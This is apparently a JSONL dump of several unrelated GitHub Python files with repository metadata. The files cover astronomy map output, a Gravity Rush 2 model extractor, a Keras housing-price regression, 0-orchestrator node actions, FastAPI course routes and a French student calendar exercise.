0.7)\nplt.subplot(132)\nplt.imshow(vel, origin = 'lower', vmin = -300, vmax = 300, cmap ='jet')\nplt.colorbar(shrink = 0.7)\nplt.subplot(133)\nplt.imshow(disp, origin = 'lower', vmin = 0, vmax =200, cmap = 'jet')\nplt.colorbar(shrink = 0.7)\n\nhdu = fits.PrimaryHDU(mod)\nhdul = fits.HDUList([hdu])\nhdul.writeto('model_3_2gx.fits')\n\n\nhdu = fits.PrimaryHDU(flux_map)\nhdul = fits.HDUList([hdu])\nhdul.writeto('flux_map_spiral_3_2gx.fits')\nhdu = fits.PrimaryHDU(vel_map)\nhdul = fits.HDUList([hdu])\nhdul.writeto('vel_map_spiral_3_2gx.fits')\nhdu = fits.PrimaryHDU(vdisp_map)\nhdul = fits.HDUList([hdu])\nhdul.writeto('vdisp_map_spiral_3_2gx.fits')\n\n","repo_name":"taurosss/Galaxy_outflow_final","sub_path":"spiral_fit_2gx_parallel.py","file_name":"spiral_fit_2gx_parallel.py","file_ext":"py","file_size_in_byte":17155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14231984166","text":"# Noesis Gravity Rush 2 .evb Extractor\n\nfrom inc_noesis import *\nimport noesis\nimport rapi\nimport os\n\ndebug = False\nglobal_scale = 100\n\ndef registerNoesisTypes():\n\n handle = noesis.register('Gravity Rush 2 evb database', '.evb')\n noesis.setHandlerTypeCheck(handle, noepyCheckType)\n noesis.setHandlerLoadModel(handle, noepyLoadModel)\n if debug:\n noesis.logPopup() # please comment out when done.\n return 1\n\n\ndef noepyCheckType(data):\n file = NoeBitStream(data)\n if len(data) < 4:\n return 0\n header = file.readBytes(4).decode('ASCII').rstrip(\"\\0\")\n if header == 'FBKK':\n return 1\n return 0\n\n# loading the bones!\n\n\ndef noepyLoadModel(data, mdlList):\n global bs\n bs = NoeBitStream(data)\n\n global bones\n bones = []\n\n bs.seek(0x38, NOESEEK_ABS)\n file_name = loadStringFromPointer(bs.readUInt())\n print(\"Filename: \" + file_name)\n bs.seek(0x24, NOESEEK_REL)\n num_of_data_chunk = bs.readUInt()\n bs.seek(bs.readUInt() - 4, NOESEEK_REL)\n for dataChunkIndex in range(num_of_data_chunk):\n readDataChunk(bs.readUInt())\n\n mdl = NoeModel()\n mdl.setBones(bones)\n mdlList.append(mdl)\n return 1\n\n\ndef readDataChunk(offset):\n origonal_offset = bs.tell()\n bs.seek(offset - 4, NOESEEK_REL)\n print(\"Loading Data Chunk at \" + hex(bs.tell()))\n # print(\"Upstream - \" + hex(origonal_offset))\n # print(\"offset - \" + hex(offset))\n bs.seek(0x08, NOESEEK_REL)\n name = loadStringFromPointer(bs.readUInt())\n print(\"Data Chunk name: \" + name)\n bs.seek(0x24, NOESEEK_REL)\n subdata_chunk_count = bs.readUInt()\n subindex_chunk_location = bs.tell() + bs.readUInt()\n bs.seek(0x18, NOESEEK_REL)\n # Loading root bone\n rotation = NoeQuat.fromBytes(bs.readBytes(16))\n translation = NoeVec3.fromBytes(bs.readBytes(12)) * NoeVec3((global_scale, global_scale, global_scale))\n bs.seek(4, NOESEEK_REL)\n scale = NoeVec3.fromBytes(bs.readBytes(12))\n boneMat = rotation.toMat43(transposed=1)\n boneMat[3] = translation\n boneIndex = len(bones)\n bones.append(NoeBone(boneIndex, name, boneMat))\n bs.seek(0x18, NOESEEK_REL)\n parent_name = loadStringFromPointer(bs.readUInt())\n print(\"Parent name: \" + parent_name)\n # Loading Sub Index Chunk\n bs.seek(subindex_chunk_location, NOESEEK_ABS)\n for subDataChunkIndex in range(subdata_chunk_count):\n readSubDataChunk(bs.readUInt(), boneIndex)\n bs.seek(origonal_offset, NOESEEK_ABS)\n return\n\n\ndef readSubDataChunk(offset, parentBoneIndex):\n origonal_offset = bs.tell()\n bs.seek(offset - 4, NOESEEK_REL)\n print(\"Loading Sub Data Chunk at \" + hex(bs.tell()))\n bs.seek(0x08, NOESEEK_REL)\n name = loadStringFromPointer(bs.readUInt())\n print(\"Sub Data Chunk name: \" + name)\n bs.seek(0x0C, NOESEEK_REL)\n bs.seek(bs.readUInt() - 4, NOESEEK_REL)\n # Loading bone\n rotation = NoeQuat.fromBytes(bs.readBytes(16))\n translation = NoeVec3.fromBytes(bs.readBytes(12)) * NoeVec3((global_scale, global_scale, global_scale))\n bs.seek(4, NOESEEK_REL)\n scale = NoeVec3.fromBytes(bs.readBytes(12))\n boneMat = rotation.toMat43(transposed=1)\n boneMat[3] = translation\n #boneMat *= bones[parentBoneIndex].getMatrix() \n boneIndex = len(bones)\n bones.append(NoeBone(boneIndex, name, boneMat, None, parentBoneIndex))\n\n bs.seek(origonal_offset, NOESEEK_ABS)\n return\n\n\ndef loadStringFromPointer(offset):\n origonal_offset = bs.tell()\n bs.seek(offset - 4, NOESEEK_REL)\n string = bs.readBytes(64).split(b'\\x00')[0].decode('UTF8')\n bs.seek(origonal_offset, NOESEEK_ABS)\n return string\n","repo_name":"Team-Alua/GR2-evb-extractor","sub_path":"GravityRush2_evb.py","file_name":"GravityRush2_evb.py","file_ext":"py","file_size_in_byte":3611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73202436625","text":"from keras import models\nfrom keras import layers\nfrom keras.datasets import boston_housing\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef get_model():\n\tmodel = models.Sequential()\n\tmodel.add(layers.Dense(64, activation=\"relu\", input_shape=(train_data.shape[1],)))\n\tmodel.add(layers.Dense(64, activation=\"relu\"))\n\t# No activation on the last layer as it is purely linear value\n\tmodel.add(layers.Dense(1))\n\t# mse - mean squared error - good for regression problems\n\t# mae + mean absolute error - the absolute value of the difference between predictions and targets\n\tmodel.compile(optimizer=\"rmsprop\", loss=\"mse\", metrics=[\"mae\"])\n\treturn model\n\n\ndef smooth_curve(points, factor=0.9):\n\tsmoothed_points = []\n\tfor point in points:\n\t\tif smoothed_points:\n\t\t\tprevious = smoothed_points[-1]\n\t\t\tsmoothed_points.append(previous * factor + point * (1 - factor))\n\t\telse:\n\t\t\tsmoothed_points.append(point)\n\treturn smoothed_points\n\n(train_data, train_targets), (test_data, test_targets) = boston_housing.load_data()\n\nmean = train_data.mean(axis=0)\ntrain_data -= mean\nstd = train_data.std(axis=0)\ntrain_data /= std\n\n\n# k-fold validation\nk = 4\nnum_val_samples = len(train_data) // k\nnum_epochs = 100\nall_mae_histories = []\n\n\nfor i in range(k):\n\tprint(\"Processing fold #\", i)\n\tval_data = train_data[i * num_val_samples: (i +1) * num_val_samples]\n\tval_targets = train_targets[i * num_val_samples: (i +1) * num_val_samples]\n\n\tpartial_train_data = np.concatenate(\n\t\t[train_data[:i * num_val_samples],\n\t\ttrain_data[(i + 1) * num_val_samples:]],\n\t\taxis=0)\n\n\tpartial_train_targets = np.concatenate(\n\t\t[train_targets[:i * num_val_samples],\n\t\ttrain_targets[(i + 1) * num_val_samples:]],\n\t\taxis=0)\n\n\tprint(\"Num val samples: \", num_val_samples)\n\tprint(\"Partial train: \", len(partial_train_data))\n\n\tmodel = get_model()\n\thistory = model.fit(\n\t\tpartial_train_data, \n\t\tpartial_train_targets, \n\t\tvalidation_data=(val_data, val_targets),\n\t\tepochs=num_epochs, \n\t\tbatch_size=1, \n\t\tverbose=0)\n\n\tprint(history.history)\n\tmae_history = history.history[\"mean_absolute_error\"]\n\tall_mae_histories.append(mae_history)\n\naverage_mae_history = [np.mean([x[i] for x in all_mae_histories]) for i in range(num_epochs)]\n\nplt.plot(range(1, len(average_mae_history) + 1), average_mae_history)\nplt.xlabel([\"Epochs\"])\nplt.ylabel([\"Validation MAE\"])\nplt.show()\n\nplt.clf()\n\nsmooth_mae_history = smooth_curve(average_mae_history[10:])\nplt.plot(range(1, len(smooth_mae_history) + 1), smooth_mae_history)\nplt.xlabel([\"Epochs\"])\nplt.ylabel([\"Validation MAE\"])\nplt.show()\n\n","repo_name":"KasparPeterson/deep-learning-with-python","sub_path":"house_prices.py","file_name":"house_prices.py","file_ext":"py","file_size_in_byte":2521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2117636411","text":"from js9 import j\n\n\ndef get_stats_collector(service):\n stats_collectors_services = service.consumers.get('stats_collector')\n if stats_collectors_services:\n return stats_collectors_services[0]\n\n\ndef get_statsdb(service):\n statsdb_services = service.aysrepo.servicesFind(role='statsdb')\n if statsdb_services:\n return statsdb_services[0]\n\n\ndef get_version(job):\n from zeroos.orchestrator.sal.Node import Node\n from zeroos.orchestrator.configuration import get_jwt_token\n service = job.service\n if service.model.data.status != 'running':\n version = ''\n else:\n node = Node.from_ays(service, get_jwt_token(job.service.aysrepo))\n pong = node.client.ping()\n version = pong.split('Version: ')[1] if pong else ''\n\n service.model.data.version = version\n service.saveAll()\n return version\n\n\ndef input(job):\n from zeroos.orchestrator.sal.Node import Node\n from zeroos.orchestrator.configuration import get_configuration, get_jwt_token\n\n args = job.model.args\n ip = args.get('redisAddr')\n node = Node(ip, args.get('redisPort'), get_jwt_token(job.service.aysrepo))\n\n config = get_configuration(job.service.aysrepo)\n version = node.client.info.version()\n core0_version = config.get('0-core-version')\n core0_revision = config.get('0-core-revision')\n\n if (core0_version and core0_version != version['branch']) or \\\n (core0_revision and core0_revision != version['revision']):\n raise RuntimeError(\n 'Node with IP {} has a wrong version. Found version {}@{} and expected version {}@{} '.format(\n ip, version['branch'], version['revision'], core0_version, core0_revision))\n\n\ndef init(job):\n from zeroos.orchestrator.sal.Node import Node\n from zeroos.orchestrator.configuration import get_jwt_token\n\n service = job.service\n node = Node.from_ays(service, get_jwt_token(service.aysrepo))\n job.logger.info('create storage pool for fuse cache')\n poolname = '{}_fscache'.format(service.name)\n\n storagepool = node.ensure_persistance(poolname)\n storagepool.ays.create(service.aysrepo)\n\n statsdb_service = get_statsdb(service)\n if statsdb_service:\n stats_collector_actor = service.aysrepo.actorGet('stats_collector')\n args = {\n 'node': service.name,\n 'port': statsdb_service.model.data.port,\n 'ip': statsdb_service.parent.model.data.redisAddr,\n\n }\n stats_collector_service = stats_collector_actor.serviceCreate(instance=service.name, args=args)\n stats_collector_service.consume(service)\n\n\ndef getAddresses(job):\n service = job.service\n networks = service.producers.get('network', [])\n networkmap = {}\n for network in networks:\n networkmap[network.name] = network.executeAction('getAddresses', args={'node_name': service.name})\n return networkmap\n\n\ndef install(job):\n from zeroos.orchestrator.sal.Node import Node\n from zeroos.orchestrator.configuration import get_jwt_token\n\n job.context['token'] = get_jwt_token(job.service.aysrepo)\n\n # at each boot recreate the complete state in the system\n service = job.service\n node = Node.from_ays(service, get_jwt_token(job.service.aysrepo))\n get_version(job)\n job.logger.info('mount storage pool for fuse cache')\n poolname = '{}_fscache'.format(service.name)\n node.ensure_persistance(poolname)\n\n # Set host name\n node.client.system('hostname %s' % service.model.data.hostname).get()\n node.client.bash('echo %s > /etc/hostname' % service.model.data.hostname).get()\n\n job.logger.info('configure networks')\n for network in service.producers.get('network', []):\n network.executeAction('configure', args={'node_name': service.name})\n\n stats_collector_service = get_stats_collector(service)\n statsdb_service = get_statsdb(service)\n if stats_collector_service and statsdb_service and statsdb_service.model.data.status == 'running':\n stats_collector_service.executeAction('install', context=job.context)\n node.client.bash('modprobe ipmi_si && modprobe ipmi_devintf').get()\n\n\ndef monitor(job):\n from zeroos.orchestrator.sal.Node import Node\n from zeroos.orchestrator.sal.healthcheck import HealthCheckObject\n from zeroos.orchestrator.configuration import get_jwt_token, get_configuration\n\n service = job.service\n config = get_configuration(service.aysrepo)\n token = get_jwt_token(job.service.aysrepo)\n job.context['token'] = token\n\n install_action = service.model.actionsState['install']\n if install_action != 'ok' and install_action != 'error':\n return\n\n healthcheck_service = job.service.aysrepo.serviceGet(role='healthcheck',\n instance='node_%s' % service.name,\n die=False)\n if healthcheck_service is None:\n healthcheck_actor = service.aysrepo.actorGet('healthcheck')\n healthcheck_service = healthcheck_actor.serviceCreate(instance='node_%s' % service.name)\n service.consume(healthcheck_service)\n\n nodestatus = HealthCheckObject('nodestatus', 'Node Status', 'Node Status', '/nodes/{}'.format(service.name))\n\n node = Node.from_ays(service, token, timeout=5)\n state = node.is_running()\n\n if state:\n service.model.data.status = 'running'\n configured = node.is_configured(service.name)\n if not configured:\n service.executeAction('install', context=job.context)\n for consumer in service.getConsumersRecursive():\n consumer.self_heal_action('monitor')\n stats_collector_service = get_stats_collector(service)\n statsdb_service = get_statsdb(service)\n\n # Check if statsdb is installed on this node and start it if needed\n if (statsdb_service and str(statsdb_service.parent) == str(job.service)\n and statsdb_service.model.data.status != 'running'):\n statsdb_service.executeAction('start', context=job.context)\n\n # Check if there is a running statsdb and if so make sure stats_collector for this node is started\n if (stats_collector_service and stats_collector_service.model.data.status != 'running'\n and statsdb_service.model.data.status == 'running'):\n stats_collector_service.executeAction('start', context=job.context)\n\n # healthchecks\n nodestatus.add_message('node', 'OK', 'Node is running')\n update_healthcheck(job, healthcheck_service, node.healthcheck.openfiledescriptors())\n update_healthcheck(job, healthcheck_service, node.healthcheck.cpu_mem())\n update_healthcheck(job, healthcheck_service, node.healthcheck.rotate_logs())\n update_healthcheck(job, healthcheck_service, node.healthcheck.network_bond())\n update_healthcheck(job, healthcheck_service, node.healthcheck.interrupts())\n update_healthcheck(job, healthcheck_service, node.healthcheck.context_switch())\n update_healthcheck(job, healthcheck_service, node.healthcheck.threads())\n update_healthcheck(job, healthcheck_service, node.healthcheck.qemu_vm_logs())\n update_healthcheck(job, healthcheck_service, node.healthcheck.network_load())\n update_healthcheck(job, healthcheck_service, node.healthcheck.disk_usage())\n update_healthcheck(job, healthcheck_service, node.healthcheck.ssh_cleanup(job=job))\n\n flist = config.get('healthcheck-flist', 'https://hub.gig.tech/gig-official-apps/healthcheck.flist')\n with node.healthcheck.with_container(flist) as cont:\n update_healthcheck(job, healthcheck_service, node.healthcheck.node_temperature(cont))\n update_healthcheck(job, healthcheck_service, node.healthcheck.powersupply(cont))\n update_healthcheck(job, healthcheck_service, node.healthcheck.fan(cont))\n\n # check network stability of node with the rest of the nodes ! TODO\n else:\n if service.model.data.status != 'rebooting':\n service.model.data.status = 'halted'\n nodestatus.add_message('node', 'ERROR', 'Node is halted')\n update_healthcheck(job, healthcheck_service, nodestatus.to_dict())\n get_version(job)\n service.saveAll()\n\n\ndef update_healthcheck(job, health_service, healthchecks):\n import time\n\n service = job.service\n\n interval = service.model.actionGet('monitor').period\n new_healthchecks = list()\n if not isinstance(healthchecks, list):\n healthchecks = [healthchecks]\n defaultresource = '/nodes/{}'.format(service.name)\n for health_check in healthchecks:\n for health in health_service.model.data.healthchecks:\n # If this healthcheck already exists, update its attributes\n if health.id == health_check['id']:\n health.name = health_check.get('name', '')\n health.resource = health_check.get('resource', defaultresource) or defaultresource\n health.messages = health_check.get('messages', [])\n health.category = health_check.get('category', '')\n health.lasttime = time.time()\n health.interval = interval\n health.stacktrace = health_check.get('stacktrace', '')\n break\n else:\n # healthcheck doesn't exist in the current list, add it to the list of new\n health_check['lasttime'] = time.time()\n health_check['interval'] = interval\n new_healthchecks.append(health_check)\n\n old_healthchecks = health_service.model.data.to_dict().get('healthchecks', [])\n old_healthchecks.extend(new_healthchecks)\n health_service.model.data.healthchecks = old_healthchecks\n\n\ndef reboot(job):\n import time\n import redis\n from zeroos.orchestrator.sal.Node import Node\n from zeroos.orchestrator.configuration import get_jwt_token\n\n token = get_jwt_token(job.service.aysrepo)\n job.context['token'] = token\n service = job.service\n service._recurring_tasks['monitor'].stop()\n try:\n start = time.time()\n # Make sure any running monitor action finishes before we reboot\n while time.time() < start + 60:\n if not j.core.jobcontroller.db.jobs.list(\n actor='node.zero-os', action='monitor', state='running', service=service.name):\n break\n time.sleep(1)\n else:\n raise j.exceptions.RuntimeError('Failed to reboot node. Waiting for monitoring action for too long')\n\n force_reboot = service.model.data.forceReboot\n vms = service.consumers.get('vm') or []\n for vm in vms:\n if vm.model.data.status != 'halted':\n if not force_reboot:\n raise j.exceptions.RuntimeError(\n 'Failed to reboot node. Force reboot is not enabled and some vms are not halted')\n else:\n vm.executeAction('shutdown', context=job.context)\n service.model.data.status = 'rebooting'\n job.logger.info('reboot node {}'.format(service))\n node = Node.from_ays(service, job.context['token'])\n node.client.raw('core.reboot', {})\n finally:\n start = time.time()\n while time.time() < start + 10:\n try:\n node = Node.from_ays(service, token, timeout=5)\n node.client.testConnectionAttempts = 0\n node.client.ping()\n except (RuntimeError, ConnectionError, redis.TimeoutError, TimeoutError):\n break\n time.sleep(1)\n else:\n job.logger.info(\"Could not wait within 10 seconds for node to reboot\")\n service._recurring_tasks['monitor'].start()\n\n\ndef uninstall(job):\n from zeroos.orchestrator.configuration import get_jwt_token\n\n job.context['token'] = get_jwt_token(job.service.aysrepo)\n\n service = job.service\n stats_collector_service = get_stats_collector(service)\n if stats_collector_service:\n stats_collector_service.executeAction('uninstall', context=job.context)\n\n statsdb_service = get_statsdb(service)\n if statsdb_service and str(statsdb_service.parent) == str(service):\n statsdb_service.executeAction('uninstall', context=job.context)\n\n bootstraps = service.aysrepo.servicesFind(actor='bootstrap.zero-os')\n if bootstraps:\n bootstraps[0].executeAction('delete_node', args={'node_name': service.name})\n\n # Remove etcd_cluster if this was the last node service\n node_services = service.aysrepo.servicesFind(role='node')\n if len(node_services) > 1:\n return\n\n for etcd_cluster_service in service.aysrepo.servicesFind(role='etcd_cluster'):\n etcd_cluster_service.executeAction('delete', context=job.context)\n etcd_cluster_service.delete()\n\n\ndef watchdog(job):\n from zeroos.orchestrator.sal.Pubsub import Pubsub\n from zeroos.orchestrator.configuration import get_jwt_token\n from asyncio import sleep\n import asyncio\n import re\n import traceback\n\n service = job.service\n watched_roles = {\n 'nbdserver': {\n 'level': 20,\n 'message': (re.compile('.*'),),\n 'eof': True\n },\n 'tlogserver': {\n 'eof': True,\n },\n 'ork': {\n 'level': 20,\n 'instance': job.service.name,\n 'service': 'node',\n 'eof': False,\n 'message': (re.compile('.*'),),\n 'handler': 'ork_handler',\n },\n 'kvm': {\n 'level': 20,\n 'instance': job.service.name,\n 'service': 'node',\n 'eof': False,\n 'message': (re.compile('.*'),),\n 'handler': 'vm_handler',\n 'sub_id': 'events',\n },\n 'cloudinit': {\n 'eof': True,\n },\n 'http': {\n 'eof': True,\n },\n 'dhcp': {\n 'eof': True,\n },\n 'storage_engine': {\n 'eof': True,\n },\n \"etcd\": {\n \"eof\": True,\n },\n 'stats_collector': {\n 'eof': True,\n },\n 'zerostor': {\n 'eof': True,\n },\n 'container': {\n \"eof\": True,\n },\n }\n\n async def callback(jobid, level, message, flag):\n if '.' not in jobid:\n return\n\n role, sub_id = jobid.split('.', 1)\n if (role not in watched_roles or\n watched_roles[role].get('level', level) != level\n or watched_roles[role].get('sub_id', sub_id) != sub_id):\n return\n\n service_role = watched_roles[role].get('service', role)\n instance = watched_roles[role].get('instance', sub_id)\n\n eof = flag & 0x6 != 0\n\n valid_message = False\n matched_messages = watched_roles[role].get('message', ())\n for msg in matched_messages:\n if msg.match(message):\n valid_message = True\n\n if not valid_message and not (watched_roles[role]['eof'] and eof):\n return\n\n srv = service.aysrepo.serviceGet(role=service_role, instance=instance, die=False)\n if srv:\n args = {'message': message, 'eof': eof, 'level': level}\n job.context['token'] = get_jwt_token(job.service.aysrepo)\n handler = watched_roles[role].get('handler', 'watchdog_handler')\n await srv.asyncExecuteAction(handler, context=job.context, args=args)\n\n async def check_node(job):\n job.context['token'] = get_jwt_token(job.service.aysrepo)\n try:\n cl = Pubsub(service._loop, service.model.data.redisAddr, password=job.context['token'], callback=callback)\n await cl.ping()\n service.model.data.status = 'running'\n except (RuntimeError, OSError) as e:\n service.model.data.status = 'halted'\n\n async def streaming(job):\n # Check if the node is runing\n while service.model.actionsState['install'] != 'ok':\n await sleep(5)\n\n while str(service.model.data.status) != 'running':\n await sleep(5)\n\n # Add the looping here instead of the pubsub sal\n cl = None\n subscribed = None\n\n while True:\n if str(service.model.data.status) != 'running':\n await sleep(5)\n continue\n if cl is None:\n job.context['token'] = get_jwt_token(job.service.aysrepo)\n cl = Pubsub(service._loop, service.model.data.redisAddr, password=job.context['token'], callback=callback)\n\n try:\n if not subscribed:\n queue = await cl.subscribe('ays.monitor')\n subscribed = True\n await cl.global_stream(queue)\n except asyncio.TimeoutError as e:\n job.logger.error(e)\n await check_node(job)\n cl = None\n subscribed = None\n except OSError as e:\n job.logger.error(e)\n await check_node(job)\n cl = None\n subscribed = None\n except RuntimeError as e:\n job.logger.error(e)\n await check_node(job)\n cl = None\n subscribed = None\n except Exception as e:\n job.logger.error(traceback.format_exc())\n await check_node(job)\n cl = None\n subscribed = None\n\n return streaming(job)\n\n\ndef nic_shutdown(job, message):\n from zeroos.orchestrator.sal.Node import Node\n from zeroos.orchestrator.configuration import get_jwt_token\n\n service = job.service\n node = Node.from_ays(service, get_jwt_token(service.aysrepo))\n interface = message['name']\n\n if interface.startswith('cont'):\n container_id = interface.split('-')[0].replace('cont', '')\n for container in node.containers.list():\n if str(container.id) == container_id:\n container_service = service.aysrepo.serviceGet(role='container', instance=container.name)\n container_service.model.data.status = 'networkKilled'\n container_service.saveAll()\n return\n else:\n vms = node.client.kvm.list()\n for vm in vms:\n if interface in vm['ifctargets']:\n vm_service = service.aysrepo.serviceGet(role='vm', instance=vm['name'])\n vm_service.model.data.status = 'networkKilled'\n vm_service.saveAll()\n return\n\n job.logger.info('Failed to find vm/container interface matching %s' % interface)\n\n\ndef ork_handler(job):\n import json\n from zeroos.orchestrator.utils import send_event\n\n message = job.model.args.get('message')\n if not message:\n return\n\n message = json.loads(message)\n send_event('ork', message, job.service.aysrepo)\n\n if message['event'] == 'NIC_SHUTDOWN':\n nic_shutdown(job, message)\n elif message['event'] == 'VM_QUARANTINE' and message['state'] == 'WARNING':\n job.logger.info('VM %s exceeded cpu threshold and will be quarantined soon' % message['name'])\n elif message['event'] == 'VM_QUARANTINE' and message['state'] == 'SUCCESS':\n job.logger.info('Vm %s has been quarantined' % message['name'])\n elif message['event'] == 'VM_UNQUARANTINE' and message['state'] == 'SUCCESS':\n job.logger.info('Vm %s has been released from quarantine' % message['name'])\n\n\ndef start_vm(job, vm):\n import asyncio\n from zeroos.orchestrator.configuration import get_jwt_token\n\n if vm.model.data.status == 'running':\n job.context['token'] = get_jwt_token(job.service.aysrepo)\n\n asyncio.ensure_future(vm.asyncExecuteAction('start', context=job.context), loop=job.service._loop)\n\n\ndef shutdown_vm(job, vm):\n import asyncio\n from zeroos.orchestrator.configuration import get_jwt_token\n\n if vm.model.data.status == 'running':\n job.context['token'] = get_jwt_token(job.service.aysrepo)\n asyncio.ensure_future(vm.asyncExecuteAction('shutdown', context=job.context), loop=job.service._loop)\n\n\ndef vm_handler(job):\n import json\n import asyncio\n\n message = job.model.args.get('message')\n if not message:\n return\n\n message = json.loads(message)\n vm = job.service.aysrepo.serviceGet(role='vm', instance=message['name'])\n if not vm:\n return\n\n if message['event'] == 'stopped' and message['detail'] == 'failed':\n asyncio.ensure_future(start_vm(job, vm))\n\n if message['event'] == 'stopped' and message['detail'] == 'shutdown':\n asyncio.ensure_future(shutdown_vm(job, vm))\n\n\ndef processChange(job):\n service = job.service\n args = job.model.args\n node_data = service.model.data.to_dict()\n if 'forceReboot' in args and node_data.get('forceReboot') != args['forceReboot']:\n service.model.data.forceReboot = args['forceReboot']\n service.saveAll()\n","repo_name":"0xIslamTaha/0-orchestrator","sub_path":"templates/node.zero-os/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":20936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"5471695131","text":"# from . import schemas, models\nfrom sqlalchemy.orm import Session\nfrom fastapi import Depends, HTTPException, status, APIRouter, Response\nfrom typing import Optional, List\n\nfrom models.index import get_db, Course\nfrom schemas.course import Course as SCourse, CoursePost, CoursePostResponse, CourseTutor, CourseQuestion\nfrom auth import auth\n\n\nrouter = APIRouter()\n\n\n@router.get(\"\", response_model=List[CourseTutor], status_code=200)\ndef get_courses(db: Session = Depends(get_db)):\n courses = db.query(Course).all()\n return courses\n\n\n@router.get(\"/{id}\", response_model=SCourse, status_code=status.HTTP_200_OK)\ndef get_course(id: int, db: Session = Depends(get_db)):\n course = db.query(Course).filter(Course.id == id).first()\n if course is None:\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=\"Course with ID doesn't exist\",\n )\n return course\n\n\n\n@router.get(\"/{id}/questions\", response_model=CourseQuestion, status_code=status.HTTP_200_OK)\ndef get_course_questions(id: int, db: Session = Depends(get_db)):\n course = db.query(Course).filter(Course.id == id).first()\n if course is None:\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=\"Course with ID doesn't exist\",\n )\n return course\n\n \n\n\n@router.post(\"\", response_model=CoursePostResponse, status_code=status.HTTP_201_CREATED)\n# @router.post(\"\", status_code=status.HTTP_201_CREATED)\ndef create_course(\n course: CoursePost, auth=Depends(auth), db: Session = Depends(get_db)\n):\n # return auth\n if auth.role != \"tutor\":\n raise HTTPException(\n status_code=403, detail=\"You have to be a tutor to create a course\"\n )\n\n course.tutor_id = auth.id\n db_course = db.query(Course).filter(Course.name == course.name).first()\n # return auth\n if db_course is not None:\n raise HTTPException(status_code=400, detail=\"Course with name already exists\")\n\n new_course = Course(**course.dict())\n\n db.add(new_course)\n db.commit()\n\n return new_course\n\n\n# @router.put('/{id}',response_model=SCourse,status_code=status.HTTP_200_OK)\n# def update_course(id:int, course:SCourse, db: Session = Depends(get_db)):\n# db_course=db.query(Course).filter(Course.id==id).first()\n# # db_course.email=course.email\n# # db_course.firstname=course.firstname\n# # db_course.lastname=course.lastname\n# db_course.phone = course.phone\n\n# db.commit()\n\n# return db_course\n","repo_name":"leyume/learnducate","sub_path":"backend/app/routes/courses.py","file_name":"courses.py","file_ext":"py","file_size_in_byte":2509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24844461810","text":"from math import sqrt\n\n\ndef reverse_list(s):\n print(type(s), s)\n temp_list = list(s)\n print(type(temp_list), temp_list)\n test = temp_list.reverse()\n print(temp_list)\n print(type(test))\n return ''.join(temp_list)\n\n\nword = \"oki\"\n# print(reverse_list(word))\n\ntab = ['test', 'oki', 'doki']\ntab.reverse()\ntesttab = tab\n# print(testtab)\n\n# *---------------------------------------\n# Al-Khwarizmi\nbu_s = 14\nbu_n = 20\nbu_o = 1775\n\nroot = 34\nnum = 40*1775\n\nmid_root = root/2\nresult_by_self = mid_root*mid_root\nresult = result_by_self+num\nnew_result = sqrt(result)\nfinish = new_result - mid_root\n# print(finish)\n\n# *------------------------------------------------\n# *Calendar\n# TODO :\n# on se donne la liste des noms des mois, la liste des longueurs des mois, l'année, le premier jour de l'année sous la forme :\n# 0 pour lundi\n# 1 pour mardi\n# ...\n# 6 pour dimanche\npremier_jour = 0\nannee = 2023\nmois_j = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\nmois_n = [\"jan\", \"fev\", \"mar\", \"avr\", \"mai\", \"jun\",\n \"jul\", \"aou\", \"sep\", \"oct\", \"nov\", \"dec\"]\nlist_j = [\"lu\", \"ma\", \"me\",\n \"je\", \"ve\", \"sa\", \"di\"]\n# *-----------------------------\n# modifier la liste des longueurs de mois pour le cas d'une année bisextile\nmois_bis = [31, 29, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\n# *-------------------------------------\n# imprimer les 365 numéros de jours...\n# à la suite (1 2 3 4 ... 31 1 2 3 ... 28 ... 1 2 3 ... 31 1 2 ... 31)\n# sans chercher à grouper, juste les jours les uns après les autres, sur 365 lignes..\n# for j in range(len(mois_n)):\n# for i in range((mois_j[j])):\n# if i % 7 == 0:\n# print(end=\"\\n\")\n# print(i+1, \"\", end=\"\")\n# print(\"\", end=\"\\n\")\n# *-----------------------------------\n# même chose que ci-dessus, en revenant à la ligne tous les 7 jours :\n# print(4) : passe à la ligne\n# print(5, end=\"\") : ne passe pas à la ligne\n# le résultat ne ressemble toujouors pas à grand chose... mais on y arrive\n# *-----------------------------------\n# on peut maintenant ajouter un séparateur rudimentaire comme \"----------------------\"\n# ansi que le nom du mois, et une ligne d'entête : print(\"lun mar mer jeu ven sam dim\")\nfirst_day = 0\nfor j in range(len(mois_n)):\n print(\" \", mois_n[j])\n print(\" \".join(list_j), end=\"\\n\")\n if first_day > 0:\n for x in range(first_day):\n print(\" \", end=\"\")\n for i in range((mois_j[j])):\n # print(i+first_day)\n if (i+first_day) % 7 == 0:\n print(end=\"\\n\")\n if (i < 10):\n print(i+1, \" \", end=\"\")\n elif (i >= 10):\n print(i+1, \"\", end=\"\")\n print(\"\", end=\"\\n\")\n print('---------')\n # print(mois_j[j]-28)\n first_day = mois_j[j]-28\n# *-----------------------------------\n# comment démarrer un mois ?\n# on va \"offsetter\"\n# essayons juste avec un mois éprouvette de 31 jours\n# jours = [x+1 for x in range(31)]\n# print(jours)\n\n\noffset = 3 # le mois démarre un jeudi\n# lundi = 0 , mardi = 1 ... dimanche = 6\n# on peut utiliser format\n# *-----------------------------------\n# calcul de l'offset suivant du mois suivant\noffset = 3\njours = 31\n\n\n# print(new_offset)\n# *-----------------------------------\n# on reprend tout ça.\npremier_jour = 0\nmois_j = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\nmois_n = [\"jan\", \"fev\", \"mar\", \"avr\", \"mai\", \"jun\",\n \"jul\", \"aou\", \"sep\", \"oct\", \"nov\", \"dec\"]\n# *-----------------------------------\n# on fait une fonction affiche_mois() qui prends en paramètres :\n# le numéro du mois (1 à 12)\n# l'offset\n# et qui renvoie le nouvel 